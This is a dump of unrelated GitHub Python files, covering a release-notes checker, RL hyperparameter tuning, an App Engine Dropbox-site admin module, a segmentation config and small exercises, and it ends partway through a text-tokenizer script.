self.get_start_from_end()\n self.get_logs()\n if orig:\n self.switch_branch(orig)\n orig = None\n self.get_notes()\n if self.args.lint:\n return\n if self.args.yaml:\n print(yaml.dump(self.notes))\n return\n self.get_report()\n\n print(self.report)\n finally:\n if orig:\n self.switch_branch(orig)\n\n def message(self, msgid):\n \"\"\"Get a message based on msgid, uses DEFAULT_CONFIG if not set.\"\"\"\n msg = self.cfg.get(\"messages\", {}).get(msgid, None)\n msg = msg or DEFAULT_CONFIG[\"messages\"][msgid]\n return msg\n\n def not_important(self, filename):\n \"\"\"True if the filename will be skipped by the branch check.\"\"\"\n skip = self.cfg.get(\"skip\", [])\n for ent in skip:\n if re.search(ent, filename):\n return True\n return False\n\n def branch_check(self):\n \"\"\"Check current branch for new notes.\"\"\"\n # target for diff, in order of precedence\n\n target = self.args.target\n\n if not target:\n br = os.environ.get(\n \"GITHUB_BASE_REF\", os.environ.get(\"CI_MERGE_REQUEST_TARGET_BRANCH_NAME\")\n ) # github & gitlab ci\n if br:\n target = \"origin/\" + br\n\n target = target or self.cfg.get(\"merge-target\")\n\n if not target:\n # no upstream configured, guess\n for ent in self.git(\n \"branch\", \"-r\", \"--format\", \"%(refname:short)\", \"--list\", \"origin/ma??*\"\n ).split(\"\\n\"):\n if ent in (\"origin/master\", \"origin/main\"):\n target = ent\n\n assert target, self.message(Msg.NEED_TARGET)\n\n try:\n diff_base = self.git(\"merge-base\", \"HEAD\", target).strip()\n print(\"Check merge target:\", target + \", diff base:\", diff_base)\n except subprocess.CalledProcessError:\n print(\"Check merge target:\", target)\n diff_base = target\n\n need_notes = False\n all_diff = self.git(\"diff\", \"--name-only\", diff_base)\n for ent in all_diff.split(\"\\n\"):\n ent = ent.strip()\n if not ent or self.not_important(ent):\n continue\n if ent.startswith(self.notes_dir):\n self.lint_file(ent)\n continue\n log.debug(\"need notes: %s\", ent)\n need_notes = True\n break\n\n if not need_notes:\n return\n\n diff = self.git(\"diff\", \"--name-only\", \"--diff-filter=A\", diff_base)\n for ent in diff.split(\"\\n\"):\n ent = ent.strip()\n if ent.startswith(self.notes_dir):\n print(\"Found new note:\", ent)\n return\n\n assert False, self.message(Msg.NEED_NOTE)\n","repo_name":"AtakamaLLC/rnotes","sub_path":"rnotes/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":14640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9668904997","text":"# ======================================================================\n# Balancio-Kit (c) 2021 Linar (UdeSA)\n# This code is licensed under MIT license (see LICENSE.txt for details)\n# ======================================================================\n\"\"\"\nScript for optimizing RL hyperparameters.\nBased on: https://github.com/araffin/rl-baselines-zoo/blob/master/utils/hyperparams_opt.py\n\"\"\"\n\n# Filter tensorflow version warnings\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nwarnings.simplefilter(action='ignore', category=Warning)\nimport tensorflow as tf\ntf.get_logger().setLevel('INFO')\ntf.autograph.set_verbosity(0)\nimport logging\ntf.get_logger().setLevel(logging.ERROR)\n\nimport yaml\nimport argparse\nfrom typing import Any, Dict\nimport gym\nfrom balancio_lib.environments import balancioGymEnv\nfrom balancio_lib.wrappers import RewardWrappers\nfrom stable_baselines import A2C\nfrom stable_baselines.common.callbacks import EvalCallback\nfrom stable_baselines.common import set_global_seeds\nimport optuna\nfrom optuna.pruners import MedianPruner\nfrom optuna.visualization import plot_optimization_history, plot_param_importances\n\n\n# Instantiate the parser\nparser = argparse.ArgumentParser(description='Script for optimizing RL hyperparameters.')\nparser.add_argument(\"-a\", \"--Algo\", action='store', default='A2C', type=str,\n help=\"Reinforcement Learning algorithm used during training [Default: 'A2C'].\")\nparser.add_argument(\"-en\", \"--EnvName\", action='store', default='p_1', type=str,\n help=\"Environment name: 'pif_b' --> p if pitch, i if imu, f if feedback, b buffer length. [Default: 'p_1'].\")\nparser.add_argument(\"-rw\", \"--RewardWrapper\", action='store', default='None', type=str,\n help=\"Apply a reward wrapper to change the default reward [Optional].\")\nargs = parser.parse_args()\n\n\n# Optuna HyperParameters Tuning\nRL_ALGO_NAME = args.Algo.upper() # Algorithm to which hp are to be optimized\nN_TRIALS = 200 # Total number of optimization iterations\nN_JOBS = 2 # Number of parallel runs\nN_TIMESTEPS = int(1e5) # Total simulation steps per trial\nN_STARTUP_TRIALS = N_TRIALS // 3 # Number of trials before enabling pruning\nN_WARMUP_STEPS = N_TIMESTEPS // 3 # Number of steps before enabling pruning, in each trial.\nN_EVALUATIONS = 5 # Number of evaluations in each trial.\nN_EVAL_EPISODES = 2 # Number of episodes to test the agent in each evaluation.\nTIMEOUT = 10 # Timeout in hours\n\n# Environment\nNORMALIZE = True\nBACKLASH = True\nmemory_buffer = int(args.EnvName[args.EnvName.find(\"_\")+1::])\nonly_pitch = not 'i' in args.EnvName\npolicy_feedback = 'f' in args.EnvName\nLoopFreq = 100 # Hz\nStepPeriod = (1 / 240) * 1 / 10 # s\nactions_per_step = int(round((1 / LoopFreq) / StepPeriod)) # For Microcontroller loop frequency compatibility\nSEED = 0\n\n\ndef sample_a2c_params(trial: optuna.Trial) -> Dict[str, Any]:\n \"\"\"Sampler for A2C hyperparameters.\"\"\"\n gamma = trial.suggest_categorical(\"gamma\", [0.9, 0.95, 0.98, 0.99, 0.995, 0.999, 0.9999])\n max_grad_norm = trial.suggest_categorical(\"max_grad_norm\", [0.3, 0.5, 0.6, 0.7, 0.8, 0.9, 1, 2, 5])\n alpha = trial.suggest_categorical(\"alpha\", [0.8, 0.9, 0.92, 0.95, 0.98, 0.99, 1.0])\n n_steps = trial.suggest_categorical(\"n_steps\", [8, 16, 32, 64, 128, 256, 512, 1024, 2048])\n vf_coef = trial.suggest_uniform(\"vf_coef\", 0, 1)\n lr_schedule = \"constant\" # trial.suggest_categorical(\"lr_schedule\", [\"linear\", \"constant\"])\n learning_rate = trial.suggest_loguniform(\"learning_rate\", 1e-5, 1)\n ent_coef = trial.suggest_loguniform(\"ent_coef\", 0.00000001, 0.1)\n # ortho_init = trial.suggest_categorical(\"ortho_init\", [False, True])\n neurons_layer = trial.suggest_categorical(\"neurons_layer\", [16, 32, 64, 128])\n # activation_fn = trial.suggest_categorical(\"activation_fn\", [\"tanh\", \"relu\"])\n\n # Display true values\n # trial.set_user_attr(\"gamma_\", gamma)\n # trial.set_user_attr(\"alpha_\", alpha)\n # trial.set_user_attr(\"n_steps\", n_steps)\n\n net_arch = 2*[neurons_layer]\n\n # net_arch = [64, 64]\n act_fun = tf.nn.relu # {\"tanh\": tf.nn.tanh, \"relu\": tf.nn.relu}[activation_fn]\n\n return {\n \"n_steps\": n_steps,\n \"gamma\": gamma,\n \"alpha\": alpha,\n \"lr_schedule\": lr_schedule,\n \"learning_rate\": learning_rate,\n \"vf_coef\": vf_coef,\n \"ent_coef\": ent_coef,\n \"max_grad_norm\": max_grad_norm,\n \"policy_kwargs\": {\n \"net_arch\": net_arch,\n \"act_fun\": act_fun,\n # \"ortho_init\": ortho_init,\n },\n }\n\n\nclass TrialEvalCallback(EvalCallback):\n \"\"\"Callback used for evaluating and reporting a trial.\"\"\"\n\n def __init__(\n self,\n eval_env: gym.Env,\n trial: optuna.Trial,\n n_eval_episodes: int = 5,\n eval_freq: int = 10000,\n deterministic: bool = True,\n verbose: int = 0,\n ):\n\n super().__init__(\n eval_env=eval_env,\n n_eval_episodes=n_eval_episodes,\n eval_freq=eval_freq,\n deterministic=deterministic,\n verbose=verbose,\n )\n self.trial = trial\n self.eval_idx = 0\n self.is_pruned = False\n\n def _on_step(self) -> bool:\n if self.eval_freq > 0 and self.n_calls % self.eval_freq == 0:\n super()._on_step()\n self.eval_idx += 1\n self.trial.report(self.last_mean_reward, self.eval_idx)\n # Prune trial if need\n if self.trial.should_prune():\n self.is_pruned = True\n return False\n return True\n\n\ndef objective(trial: optuna.Trial) -> float:\n # Add useful wrappers around the environment\n reward_wrapper = RewardWrappers.get_reward_wrapper(args.RewardWrapper)\n\n env = reward_wrapper(balancioGymEnv.BalancioGymEnv(action_repeat=actions_per_step, renders=False, normalize=NORMALIZE,\n backlash=BACKLASH, memory_buffer=memory_buffer, only_pitch=only_pitch,\n policy_feedback=policy_feedback))\n\n DEFAULT_HYPERPARAMS = {\n \"policy\": \"MlpPolicy\",\n \"env\": env,\n }\n\n kwargs = DEFAULT_HYPERPARAMS.copy()\n\n if args.Algo.upper() == \"A2C\":\n # Sample hyperparameters\n kwargs.update(sample_a2c_params(trial))\n # Create the RL model\n model = A2C(**kwargs)\n else:\n raise Exception(\"Insert a compatible RL algorithm: A2C, ...\")\n\n # Create env used for evaluation\n eval_env = reward_wrapper(balancioGymEnv.BalancioGymEnv(action_repeat=actions_per_step, renders=False, normalize=NORMALIZE,\n backlash=BACKLASH, memory_buffer=memory_buffer, only_pitch=only_pitch,\n policy_feedback=policy_feedback))\n\n # Create the callback that will periodically evaluate\n # and report the performance\n eval_callback = TrialEvalCallback(\n eval_env,\n trial,\n n_eval_episodes=N_EVAL_EPISODES,\n eval_freq=int(N_TIMESTEPS / N_EVALUATIONS),\n deterministic=True,\n )\n\n nan_encountered = False\n try:\n model.learn(N_TIMESTEPS, callback=eval_callback)\n except AssertionError as e:\n # Sometimes, random hyperparams can generate NaN\n print(e)\n nan_encountered = True\n finally:\n # Free memory\n model.env.close()\n eval_env.close()\n\n # Tell the optimizer that the trial failed\n if nan_encountered:\n return float(\"nan\")\n\n if eval_callback.is_pruned:\n raise optuna.exceptions.TrialPruned()\n\n return eval_callback.last_mean_reward\n\n\nif __name__ == \"__main__\":\n\n sampler = optuna.samplers.CmaEsSampler()\n # sampler = TPESampler(n_startup_trials=N_STARTUP_TRIALS)\n # Do not prune before 1/3 of the max budget is used\n pruner = MedianPruner(\n n_startup_trials=N_STARTUP_TRIALS, n_warmup_steps=N_WARMUP_STEPS\n )\n\n study = optuna.create_study(sampler=sampler, pruner=pruner, direction=\"maximize\")\n\n try:\n study.optimize(objective, n_trials=N_TRIALS, n_jobs=N_JOBS, timeout=int(60 * 60 * TIMEOUT))\n except KeyboardInterrupt:\n pass\n\n print(\"Number of finished trials: \", len(study.trials))\n\n print(\"Best trial:\")\n trial = study.best_trial\n\n print(f\" Value: {trial.value}\")\n\n print(\" Params: \")\n for key, value in trial.params.items():\n print(f\" {key}: {value}\")\n\n # print(\" User attrs:\")\n # for key, value in trial.user_attrs.items():\n # print(f\" {key}: {value}\")\n\n # Write report\n study.trials_dataframe().to_csv(\"../rl_data/hyperparameters/HyperParameters_optuna.csv\")\n\n with open(\"../rl_data/hyperparameters/HP.yaml\", \"w\") as f:\n param_dict = {RL_ALGO_NAME: study.best_params}\n yaml.dump(param_dict, f)\n f.close()\n\n fig1 = plot_optimization_history(study)\n fig1.show()\n fig2 = plot_param_importances(study)\n fig2.show()\n","repo_name":"udesa-ai/balancio-kit","sub_path":"simulation/hyperparameters_optimization.py","file_name":"hyperparameters_optimization.py","file_ext":"py","file_size_in_byte":9238,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"21199746023","text":"import os\nimport logging\nfrom cStringIO import StringIO\nimport cgi\nimport urllib\n\nfrom google.appengine.ext.webapp import template #Also fixes Django paths\nimport wsgiref.handlers\nfrom google.appengine.ext import webapp\nfrom google.appengine.api import users\nfrom google.appengine.api import namespace_manager\nimport dropbox.auth\nimport dropbox.client\nfrom oauth.oauth import OAuthToken\n\nimport config\nfrom siteinadropbox import models\nfrom siteinadropbox import controller\nfrom siteinadropbox import cache\nfrom siteinadropbox.handlers import dropboxhandlers\nfrom siteinadropbox.handlers.cdeferred import CDeferredHandler\n\ndef admin_url(s=None):\n if not s:\n return config.ADMIN_URL\n return config.ADMIN_URL+s\n\ndef owneronly(f):\n \"\"\"\n Decorator to populate self.site and self.user\n If a site record exists, allow only the matching user to be logged in.\n \"\"\"\n def new_f(self, *args, **kwargs):\n self.site = models.Site.get_current_site()\n self.user = users.get_current_user()\n if self.site and self.site.owner_id != self.user.user_id():\n logging.info('/admin/auth: Denying admin access for %s (id: %s). Owner ID is: %s'%(\n self.user.email(), self.user.user_id(), self.site.owner_id))\n self.response.set_status(403)\n self.render_to_template({},'admin_403.html')\n return\n f(self, *args, **kwargs)\n return new_f\n\ndef withgov(f):\n \"\"\"\n Decorator to populate self.gov and self.user\n \"\"\"\n def new_f(self, *args, **kwargs):\n try:\n self.gov = controller.get_current_site_controller()\n except models.InvalidSiteError:\n logging.debug('Access to admin page of invalid site attempted')\n self.redirect(admin_url())\n return\n self.user = users.get_current_user()\n if gov and gov.site.owner_id != user.user_id():\n logging.info('/admin/auth: Denying admin access for %s (id: %s). Owner ID is: %s'%(user.email(), user.user_id(), site.owner_id))\n self.redirect(admin_url())\n return\n return f(self, *args, **kwargs)\n return new_f\n\n#def is_namespace_allowed(namespace):\n# \"\"\"\n# Return True if an account can be established for the given namespace.\n# Currently always returns true\n# \"\"\"\n# logging.info(\"Namespace request for %s\"%namespace)\n# return True\n\nclass BaseHandler(webapp.RequestHandler):\n def render_to_template(self,template_values, template_name=None):\n values ={\n 'auth_formurl': admin_url('authorize-dropbox'),\n 'formurl': admin_url(),\n 'apps_namespace' : namespace_manager.google_apps_namespace(),\n 'current_namespace' : namespace_manager.get_namespace(),\n 'server_name' : os.environ['SERVER_NAME'],\n 'settings' : config.TEMPLATE_SETTINGS,\n 'user' : users.get_current_user(),\n 'login_url': users.create_login_url(admin_url()),\n 'logout_url': users.create_logout_url(admin_url()),\n 'request': self.request, #e.g. for request.url\n }\n values.update(template_values)\n template_path=os.path.join('templates',template_name)\n \n self.response.out.write( template.render(template_path, values))\n\nclass StatusHandler(BaseHandler):\n @owneronly\n def get(self):\n # These should always succeed: Site.get can only fail if\n # there is no logged-in user.\n if self.site:\n client = self.site.get_dropbox_client()\n dropbox_info=None\n account_good=False\n if self.site and client:\n dropbox_info=client.account_info()\n account_good= (dropbox_info.status == 200)\n #dropbox_info.data holds the account info, e.g. {u'referral_link': u'https://www.dropbox.com/referrals/NTM1NTU1Mzg5', u'display_name': u'Janus Wesenberg', u'uid': 3555538, u'country': u'SG', u'quota_info': {u'shared': 40610557, u'quota': 5905580032L, u'normal': 3305647577L}, u'email': u'janus@halwe.dk'}\n\n if account_good and (\n self.site.dropbox_display_name != dropbox_info.data['display_name'] or\n self.site.dropbox_email != dropbox_info.data['email'] ):\n\n logging.info('Updating dropbox credentials')\n self.site.dropbox_display_name = dropbox_info.data['display_name']\n self.site.dropbox_email = dropbox_info.data['email'] \n self.site.put()\n\n if account_good:\n logging.debug('/admin: Account good')\n return self.status(self.site, dropbox_info)\n logging.debug('/admin: Account not good, showing welcome page')\n return self.welcome(self.site, dropbox_info)\n\n @owneronly\n def post(self):\n \"\"\"\n Callers should supply 'action'\n Callers can supply 'redirect_url'\n Action and response will be be delivered to redirect_url \n \"\"\"\n if not self.site:\n logging.info('/admin-post: Denying admin access')\n return self.error(403)\n action = self.request.POST.get('action').lower()\n nexturl = self.request.POST.get('redirect_url', admin_url())\n gov = controller.get_current_site_controller()\n logging.debug('Admin/post, action =%s, nexturl: %s'%(action, nexturl))\n response = ''\n assert(action in ['save', 'flush', 'reload', 'verify', 'delete', 'sync'])\n if action == 'save':\n self.save_config_path()\n elif action == 'flush':\n cache.flush_all()\n elif action == 'reload':\n models.flush_resources(self.site)\n elif action == 'verify':\n gov.do_verify_database_consistency()\n elif action == 'sync':\n models.schedule_sync(gov)\n elif action == 'delete':\n #todo\n raise NotImplemented('Delte not implemented')\n \n self.redirect('%s?%s'%(nexturl, urllib.urlencode({'action': action, 'response': response})))\n\n def save_config_path(self):\n new_config_path = self.request.get('config_path')\n if self.site.set_config_path(new_config_path):\n self.site.put()\n gov = controller.get_current_site_controller()\n gov.handle_config_changes()\n self.redirect(admin_url())\n\n def welcome(self,site,dropbox_info):\n self.render_to_template({\n 'site_raw': site,\n 'dropbox_info': dropbox_info,\n },'admin_welcome.html')\n pass \n\n def status(self,site,dropbox_info):\n #Namespace listing:\n #http://code.google.com/appengine/docs/python/datastore/metadataqueries.html#Namespace_Queries\n self.render_to_template({\n 'site_raw': site,\n 'dropbox_info': dropbox_info,\n 'config_path': site.get_config_path(),\n },'admin_status.html')\n\ndef list_all_resources(nmax=1000):\n \"\"\"\n Returns a list of tupples (key_name, DirEntry instance, Resource instance),\n so that all objects of class DirEntry and Resource are represented\n \"\"\"\n resources = [(r.parent(), r) for r in models.Resource.all().fetch(nmax)]\n orphans = [(None, None, r) for (p,r) in resources if not p]\n\n direntries = dict((d.key().name(), d) for d in models.DirEntry.all().fetch(nmax))\n resources = [(p.key().name(), direntries.pop(p.key().name(),None), r) for (p,r) in resources if p]\n childless = [(d.key().name(), d, None) for d in direntries.values()]\n return orphans+sorted(resources+childless, key= lambda x: x[0])\n\ndef direntrytype(de):\n if de:\n return (\n (de.is_root() and 'R') or\n (de.is_fake() and 'P') or\n (de.is_dir and 'D') or\n 'F'\n )\n\n\nclass ContentHandler(BaseHandler):\n fields = [\n ('type', lambda k,d,r: direntrytype(d)),\n ('name', lambda k,d,r: k),\n ('url', lambda k,d,r: r and r.url),\n ('db_rev', lambda k,d,r: d and d.revision),\n ('r_rev', lambda k,d,r: r and r.revision),\n ]\n \n @owneronly\n def get(self):\n rlist = list_all_resources()\n content_list = [dict((k,f(*r)) for k,f in self.fields ) for r in rlist]\n self.render_to_template(template_name= 'admin_content.html', template_values = {'content_list': content_list})\n\n\n \nclass ConfigHandler(BaseHandler):\n @owneronly\n def get(self):\n gov = controller.get_current_site_controller()\n config_path, config_src = gov.get_config_yaml()\n self.render_to_template(template_name= 'admin_config.html',\n template_values = {'config_default': config.DEFAULT_CONFIG_YAML,\n 'config_path': config_path,\n 'config_src': config_src})\n \ndef main():\n logging.getLogger().setLevel(logging.DEBUG)\n CDeferredHandler.set_controller_factory(controller.get_current_site_controller)\n\n routes=[\n (admin_url()[:-1], webapp.RedirectHandler.new_factory(admin_url(), permanent=True)),\n (admin_url(), StatusHandler),\n (admin_url('config'), ConfigHandler),\n (admin_url('content'), ContentHandler),\n (admin_url('authorize-dropbox'), dropboxhandlers.AuthHandler.new_factory(formurl = admin_url('authorize-dropbox'), returnurl=admin_url())),\n (config.CDEFERRED_URL, CDeferredHandler)\n ]\n application = webapp.WSGIApplication(routes,debug=True)\n wsgiref.handlers.CGIHandler().run(application)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Japanuspus/Site-in-a-Dropbox","sub_path":"app/siteinadropbox/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":9573,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"8678691893","text":"# THIS IS TEMPLATE FOR FUNCTION. PLEASE FOLLOW THE RULES:\n# 1) Do Not print anything!!!\n# 2) Do not exit(0) or smth\n# 3) Please do not try to hack us.\n\n\ndef func(state: list[int]) -> int:\n \"\"\"Implementation of minimax strategy\n\n :param state: list[int]\n state[0:6] -- your pits, state[6] -- your kalah\n state[8:13] -- opponent's pits, state[13] -- opponent's kalah\n :return: int\n result for minimax\n \"\"\"\n\n # PLACE YOUR CODE HERE\n max = 0\n copy = 0\n N = len(state)\n for i in range (N):\n if state[i] > max:\n max = state[i]\n else:\n if state[i] == max:\n copy = max\n\n if max == 6:\n if state[max + 1] > state[max - 1]:\n max = max + 1\n else:\n max = max - 1\n\n if max == 13:\n max = max - 1\n\n if max > 6:\n max = 14 - max\n\n\n\n # result for minimax\n return max\n","repo_name":"Enoras/DSL_lab","sub_path":"tourn/1190996360.py","file_name":"1190996360.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70281677929","text":"#from django.conf.urls import include\nfrom django.conf.urls import url\n#from django.contrib import admin\nfrom django.contrib.auth.views import login\n\nfrom . import views\n\napp_name = 'accounts'\n\nurlpatterns = [\n #url(r'^admin/', include(admin.site.urls)),\n #url(r'^login/$', login, name='login'),\n url(r'^login/$', login,\n {'template_name': 'accounts/login.html'},\n name='login'),\n url(r'^logout/$', views.logout, name='logout'),\n]\n\n","repo_name":"akivajp/active_annotator","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73241112169","text":"# model settings\nnorm_cfg = dict(type='BN', requires_grad=True)\ndata_preprocessor = dict(\n type='SegDataPreProcessor',\n mean=[123.675, 116.28, 103.53],\n std=[58.395, 57.12, 57.375],\n bgr_to_rgb=True,\n pad_val=0,\n seg_pad_val=255,\n size = (256, 256),)\n\nmodel = dict(\n type='EncoderDecoder',\n data_preprocessor=data_preprocessor,\n pretrained='open-mmlab://resnet50_v1c',\n backbone=dict(\n type='ResNetV1c',\n depth=50,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n dilations=(1, 1, 2, 4),\n strides=(1, 2, 1, 1),\n norm_cfg=norm_cfg,\n norm_eval=False,\n style='pytorch',\n contract_dilation=True),\n decode_head=dict(\n type='PSPHead',\n in_channels=2048,\n in_index=3,\n channels=512,\n pool_scales=(1, 2, 3, 6),\n dropout_ratio=0.1,\n num_classes=6,\n norm_cfg=norm_cfg,\n align_corners=False,\n loss_decode=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)),\n auxiliary_head=dict(\n type='FCNHead',\n in_channels=1024,\n in_index=2,\n channels=256,\n num_convs=1,\n concat_input=False,\n dropout_ratio=0.1,\n num_classes=6,\n norm_cfg=norm_cfg,\n align_corners=False,\n loss_decode=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=0.4)),\n # model training and testing settings\n train_cfg=dict(),\n test_cfg=dict(mode='whole'))\n\n\n# 预训练模型权重\nload_from = 'https://download.openmmlab.com/mmsegmentation/v0.5/pspnet/pspnet_r50-d8_512x1024_40k_cityscapes/pspnet_r50-d8_512x1024_40k_cityscapes_20200605_003338-2966598c.pth'\n\n# dataset settings\ndataset_type = 'WaterMelonDataset' # 数据集类名\ndata_root = '/root/autodl-tmp/MMSeg/Watermelon87_Semantic_Seg_Mask/' # 数据集路径(相对于mmsegmentation主目录)\ncrop_size = (256, 256)\ntrain_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(type='LoadAnnotations'),\n dict(\n type='RandomResize',\n scale=(2048, 1024),\n ratio_range=(0.5, 2.0),\n keep_ratio=True),\n dict(type='RandomCrop', crop_size=crop_size, cat_max_ratio=0.75),\n dict(type='RandomFlip', prob=0.5),\n dict(type='PhotoMetricDistortion'),\n dict(type='PackSegInputs')\n]\ntest_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(type='Resize', scale=(2048, 1024), keep_ratio=True),\n # add loading annotation after ``Resize`` because ground truth\n # does not need to do resize data transform\n dict(type='LoadAnnotations'),\n dict(type='PackSegInputs')\n]\nimg_ratios = [0.5, 0.75, 1.0, 1.25, 1.5, 1.75]\ntta_pipeline = [\n dict(type='LoadImageFromFile', file_client_args=dict(backend='disk')),\n dict(\n type='TestTimeAug',\n transforms=[\n [\n dict(type='Resize', scale_factor=r, keep_ratio=True)\n for r in img_ratios\n ],\n [\n dict(type='RandomFlip', prob=0., direction='horizontal'),\n dict(type='RandomFlip', prob=1., direction='horizontal')\n ], [dict(type='LoadAnnotations')], [dict(type='PackSegInputs')]\n ])\n]\ntrain_dataloader = dict(\n batch_size=8,\n num_workers=4,\n persistent_workers=True,\n sampler=dict(type='InfiniteSampler', shuffle=True),\n dataset=dict(\n type=dataset_type,\n data_root=data_root,\n data_prefix=dict(\n img_path='img_dir/train', seg_map_path='ann_dir/train'),\n pipeline=train_pipeline))\nval_dataloader = dict(\n batch_size=1,\n num_workers=4,\n persistent_workers=True,\n sampler=dict(type='DefaultSampler', shuffle=False),\n dataset=dict(\n type=dataset_type,\n data_root=data_root,\n data_prefix=dict(\n img_path='img_dir/val', seg_map_path='ann_dir/val'),\n pipeline=test_pipeline))\ntest_dataloader = val_dataloader\n\nval_evaluator = dict(type='IoUMetric', iou_metrics=['mIoU'])\ntest_evaluator = val_evaluator\n\ndefault_scope = 'mmseg'\nenv_cfg = dict(\n cudnn_benchmark=True,\n mp_cfg=dict(mp_start_method='fork', opencv_num_threads=0),\n dist_cfg=dict(backend='nccl'),\n)\nvis_backends = [dict(type='LocalVisBackend')]\nvisualizer = dict(\n type='SegLocalVisualizer', vis_backends=vis_backends, name='visualizer')\nlog_processor = dict(by_epoch=False)\nlog_level = 'INFO'\nload_from = None\nresume = False\n\ntta_model = dict(type='SegTTAModel')\n\n# optimizer\noptimizer = dict(type='SGD', lr=0.005, momentum=0.9, weight_decay=0.0005)\noptim_wrapper = dict(type='OptimWrapper', optimizer=optimizer, clip_grad=None)\n# learning policy\nparam_scheduler = [\n dict(\n type='PolyLR',\n eta_min=1e-4,\n power=0.9,\n begin=0,\n end=40000,\n by_epoch=False)\n]\n\n# training schedule for 40k\ntrain_cfg = dict(type='IterBasedTrainLoop', max_iters=3000, val_interval=400)\nval_cfg = dict(type='ValLoop')\ntest_cfg = dict(type='TestLoop')\ndefault_hooks = dict(\n timer=dict(type='IterTimerHook'),\n logger=dict(type='LoggerHook', interval=100, log_metric_by_epoch=False),\n param_scheduler=dict(type='ParamSchedulerHook'),\n checkpoint=dict(type='CheckpointHook', by_epoch=False, interval=400,max_keep_ckpts=5, save_best='auto'),\n sampler_seed=dict(type='DistSamplerSeedHook'),\n visualization=dict(type='SegVisualizationHook'))\n\nwork_dir = '/root/workspace/03MMSegmentation/mmsegmentation/work_dirs/pspnet_r50-d8_melon'","repo_name":"songty21110133/OpenMMLabCamp","sub_path":"task4/pspnet_r50-d8_melon.py","file_name":"pspnet_r50-d8_melon.py","file_ext":"py","file_size_in_byte":5474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37517697586","text":"# import thread\nimport threading\nimport random\nimport time\n\ndef randoms(threadName, quantity, delay=0):\n randoms = []\n count = 0\n while count < quantity:\n time.sleep(delay)\n count += 1\n randoms.append(random.randint(1, 10))\n return randoms\n\nexitFlag = 0\n\nclass myThread(threading.Thread):\n def __init__(self, threadID, name):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n\n def run(self):\n # print(\"Starting \", self.name)\n numbers = randoms(self.name, random.randint(1, 10))\n\n for n in numbers:\n moves.append(n)\n # print(\"N\", numbers)\n # print(\"Exiting \", self.name)\n\nthreads = []\nmoves = []\n# Create new threads\nfor i in range(10):\n threads.append(myThread(i, \"Thread-{i}\".format(i=i)))\n\n# Start new Threads\nfor t in threads:\n t.start()\n\nprint(\"Exiting Main Thread\")\nprint(moves)\n","repo_name":"FR98/ai-hoppers","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28024066240","text":"from typing import List\nnums = [2,2,3,2]\n\nclass Solution:\n def singleNumber(self, nums: List[int]) -> int:\n dic={}\n for i in range(len(nums)):\n if nums[i] in dic:\n dic[nums[i]]=dic[nums[i]]+1\n else:dic[nums[i]]=1\n for key in dic:\n if dic[key]==1:return key\nclass Solution1:\n def singleNumber(self, nums: List[int]) -> int:\n nums.sort()\n for i in range(len(nums)-1):\n if nums[i+1] != nums[i] and nums[i-1] !=nums[i]:return nums[i]\n return nums[-1]\n\nans=Solution1()\nprint(ans.singleNumber(nums))","repo_name":"chen-gan-ga/pythonProject","sub_path":"leet-code/剑指/004只出现一次的数.py","file_name":"004只出现一次的数.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4226634234","text":"import sqlite3\n\n\nconn = sqlite3.connect('Database.db')\nc = conn.cursor()\n\n# id INTEGER PRIMARY KEY, Wealth TEXT, Learning TEXT,Project TEXT, Description TEXT, Date TEXT\n# add income to U1015728318 table to before last column\n\nc.execute(\"ALTER TABLE U1015728318 ADD COLUMN Income TEXT\")\n# make the date last column\nc.execute(\"ALTER TABLE U1015728318 ADD COLUMN Date_new TEXT\")\n# copy the old date column to the new date column\nc.execute(\"UPDATE U1015728318 SET Date_new = Date\")\nc.execute(\"ALTER TABLE U1015728318 DROP COLUMN Date\")\nc.execute(\"ALTER TABLE U1015728318 RENAME COLUMN Date_new TO Date\")\n\n# make Income = 990\nc.execute(\"UPDATE U1015728318 SET Income = 990\")\n\n\nconn.commit()\nconn.close()\n\nprint(\"Database updated\")\n\n\n# # commit the changes\n# conn.commit()\n","repo_name":"enterFaisal/my9mbot","sub_path":"remakedatabase.py","file_name":"remakedatabase.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70586021929","text":"from pathlib import Path\n\nfrom third_party.Botok.botok import Text, sentence_tokenizer, WordTokenizer\n\n\ndef sent_tok(raw):\n w = WordTokenizer()\n tokens = w.tokenize(raw, spaces_as_punct=True)\n return sentence_tokenizer(tokens)\n\n\ndef plaintext_sent_par(units, sep=\"\\n\") -> str:\n out = []\n for u in units:\n unit = \"\".join([word.text for word in u['tokens']]).strip()\n while out and unit and len(units) >= 2 and (unit[0] == \" \" or unit[0] == \"།\"):\n out[-1] += unit[0]\n if len(unit) >= 2:\n unit = unit[1:]\n else:\n unit = \"\"\n out.append(unit)\n return sep.join(out)\n\n\ninpath = Path(\"input/\")\ninfiles = list(inpath.rglob(\"*.txt\"))\nfor f in infiles:\n raw 